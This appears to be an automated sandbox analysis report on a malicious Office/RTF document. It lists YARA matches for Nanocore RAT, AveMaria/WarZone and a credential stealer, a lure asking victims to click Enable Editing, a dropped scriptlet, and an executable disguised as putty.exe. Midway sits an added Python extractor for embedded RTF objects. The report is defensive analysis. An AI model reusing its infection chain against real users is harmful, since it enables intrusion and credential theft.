        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.c60000.14.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.252baa4.22.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.3f0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.5e0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.bf0000.11.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.c50000.13.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: AveMaria_WarZone Author: unknown
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Screenshot number: 4, Screenshot OCR: Enable Editing when opening. 0 Page:l of 2 , Words:19 I 3 I N@m 13 ;a 10096 G) FI G) ,, ' I
        Source: Screenshot number: 12, Screenshot OCR: Enable Editing when opening. ii: ^ f,if= a S
        .NET source code contains very large strings
        Source: putty[1].exe.0.dr, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: putty.exe.3.dr, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: putty.exe.6.dr, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: images.exe.13.dr, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 13.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 14.2.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Source: 14.0.putty.exe.100000.0.unpack, ValidationAndControl/frmStudentInput.cs Long String: Length: 53649
        Found suspicious RTF objects
        Source: abdtfhgXgdghgh.ScT Static RTF information: Object: 0, Offset: 00000961h, abdtfhgXgdghgh.ScT
        Microsoft Office creates scripting files
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
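        Added example (not the report's own tooling, and not the actual sample): a Python extractor for the two findings above, the embedded RTF object at offset 00000961h and the .ScT scriptlet that WINWORD.EXE writes to %TEMP% from it. It walks every \objdata group in an RTF, decodes the hex, reads the OLE 1.0 ObjectHeader (OLEVersion, FormatID, class name, native data size) and, for a "Package" class object, recovers the label, original path and payload, flagging labels with a script or executable extension. The Packager native-data layout used here (0x0002 header, label, original path, flags, temp path, size, data) follows the way oletools' oleobj parses it and is an assumption, not something this report states; the constructed sample RTF reuses only the .ScT file name reported above, carries a placeholder payload, and will not reproduce the 00000961h offset of the real document.

```python
"""Added example: pull embedded OLE objects out of an RTF and identify Packager payloads."""
import re
import struct

# Hex run following an \objdata control word (stops at the closing brace; unobfuscated RTF only).
OBJDATA_RE = re.compile(rb"\\objdata\b\s*([0-9a-fA-F\s]+)")

# Inside a Packager object these extensions are executable content, not a document.
SUSPICIOUS_EXT = (".sct", ".scr", ".exe", ".dll", ".js", ".vbs", ".hta", ".ps1")


def _lp_ansi(s: bytes) -> bytes:
    """MS-OLEDS LengthPrefixedAnsiString: u32 length including the NUL, then the bytes."""
    return struct.pack("<I", 0) if not s else struct.pack("<I", len(s) + 1) + s + b"\x00"


def _read_lp_ansi(buf: bytes, pos: int):
    (n,) = struct.unpack_from("<I", buf, pos)
    pos += 4
    return buf[pos:pos + n].rstrip(b"\x00"), pos + n


def build_package_objdata(label: bytes, orig_path: bytes, payload: bytes) -> bytes:
    """OLE 1.0 ObjectHeader (FormatID 2 = embedded object) wrapped around a Packager blob.

    Assumed Packager layout: u16 0x0002, label NUL, original path NUL, u32 flags,
    u32 temp-path length, temp path NUL, u32 payload size, payload bytes.
    """
    pkg = (struct.pack("<H", 2) + label + b"\x00" + orig_path + b"\x00"
           + struct.pack("<I", 0x00030000)
           + struct.pack("<I", len(orig_path) + 1) + orig_path + b"\x00"
           + struct.pack("<I", len(payload)) + payload)
    return (struct.pack("<II", 0x00000501, 2) + _lp_ansi(b"Package")
            + _lp_ansi(b"") + _lp_ansi(b"")          # TopicName, ItemName (empty)
            + struct.pack("<I", len(pkg)) + pkg)


def parse_package(native: bytes) -> dict:
    """Recover label, original path and payload from Packager native data (assumed layout above)."""
    (magic,) = struct.unpack_from("<H", native, 0)
    if magic != 2:
        return {}
    end_label = native.index(b"\x00", 2)
    end_path = native.index(b"\x00", end_label + 1)
    pos = end_path + 1 + 4                       # skip the u32 flags
    (tlen,) = struct.unpack_from("<I", native, pos)
    pos += 4 + tlen                              # skip the temp path
    (dlen,) = struct.unpack_from("<I", native, pos)
    pos += 4
    label = native[2:end_label].decode("latin-1")
    return {"label": label,
            "orig_path": native[end_label + 1:end_path].decode("latin-1"),
            "payload": native[pos:pos + dlen],
            "suspicious": label.lower().endswith(SUSPICIOUS_EXT)}


def extract_rtf_objects(rtf: bytes) -> list:
    """One dict per \\objdata group: index, file offset, OLE header fields, Package details."""
    found = []
    for i, m in enumerate(OBJDATA_RE.finditer(rtf)):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        blob = bytes.fromhex(hexdata[:len(hexdata) & ~1].decode("ascii"))   # drop a dangling nibble
        ole_version, format_id = struct.unpack_from("<II", blob, 0)
        cls, pos = _read_lp_ansi(blob, 8)
        _topic, pos = _read_lp_ansi(blob, pos)
        _item, pos = _read_lp_ansi(blob, pos)
        (size,) = struct.unpack_from("<I", blob, pos)
        native = blob[pos + 4:pos + 4 + size]
        info = {"index": i, "offset": m.start(), "ole_version": ole_version,
                "format_id": format_id, "class": cls.decode("latin-1"), "native_size": size}
        if cls == b"Package":
            info.update(parse_package(native))
        found.append(info)
    return found


def build_sample_rtf() -> bytes:
    """Constructed sample: lure text plus one Packager object carrying a placeholder scriptlet."""
    obj = build_package_objdata(
        b"abdtfhgXgdghgh.ScT",
        b"C:\\Users\\user\\AppData\\Local\\Temp\\abdtfhgXgdghgh.ScT",
        b"<scriptlet><!-- constructed placeholder, not the real payload --></scriptlet>")
    return (b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}\\pard "
            b"Please click Enable Editing to view this document.\\par\n"
            b"{\\object\\objemb\\objw1\\objh1{\\*\\objclass Package}{\\*\\objdata "
            + obj.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    for o in extract_rtf_objects(build_sample_rtf()):
        print(f"Object: {o['index']} Offset: {o['offset']:08X}h class={o['class']} "
              f"label={o.get('label')} suspicious={o.get('suspicious')}")
```

        Against a real document call extract_rtf_objects(open(path, "rb").read()) and write each "payload" to disk for a second-stage look. Maldoc builders routinely break the hex run with control words, comments and stray braces, which this single regex does not strip; rtfobj from oletools handles that obfuscation and is the tool to reach for when the extractor above returns nothing.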
        Office process drops PE file
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\ProgramData\images.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\ProgramData\images.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe Memory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe Memory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess
        Source: C:\ProgramData\images.exe File created: C:\Windows\System32\rfxvmt.dll
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_0010B8B3
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_0010BDE0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AF450
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A5C98
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002ACD28
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A8938
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A7178
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AD150
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A6A38
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A0A50
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A7A90
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A5C89
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AD920
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AC500
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A75A8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A95B1
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AA9C0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AA5C0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A95C0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A5A78
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AA288
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A5A88
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A5EF8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002ABEC4
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AAB30
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002ABF30
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002ADF60
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AA7A0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002AD3C8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_005A0070
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_005A0006
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_0010A5BD
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 10_2_002A31F8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00400070
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0040002A
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053F450
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00535C98
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053D150
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00537178
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00538938
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053CD28
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00530A50
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00536A38
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00537A90
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00535C89
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053CD18
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053C500
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053D920
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053A9C0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053A5C0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_005395C0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_005395B1
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_005375A8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00535A78
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00535EF8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_00535A88
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053A288
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053DF60
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053AB30
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053BF30
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053D3C4
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053D3C8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_0053A7A0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 11_2_005331F8
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 12_2_0010B8B3
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 12_2_0010BDE0
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 12_2_0010A5BD
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_00413279
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_0041DEAA
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_00413279
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 15_2_0041DEAA
        Source: C:\ProgramData\images.exe Code function: 17_2_0118B8B3
        Source: C:\ProgramData\images.exe Code function: 17_2_0118BDE0
        Source: C:\ProgramData\images.exe Code function: 17_2_0035F450
        Source: C:\ProgramData\images.exe Code function: 17_2_00355C98
        Source: C:\ProgramData\images.exe Code function: 17_2_00358938
        Source: C:\ProgramData\images.exe Code function: 17_2_0035CD28
        Source: C:\ProgramData\images.exe Code function: 17_2_00357178
        Source: C:\ProgramData\images.exe Code function: 17_2_0035D150
        Source: C:\ProgramData\images.exeCode function: 17_2_00356A3817_2_00356A38
        Source: C:\ProgramData\images.exeCode function: 17_2_00357A9017_2_00357A90
        Source: C:\ProgramData\images.exeCode function: 17_2_00355C8917_2_00355C89
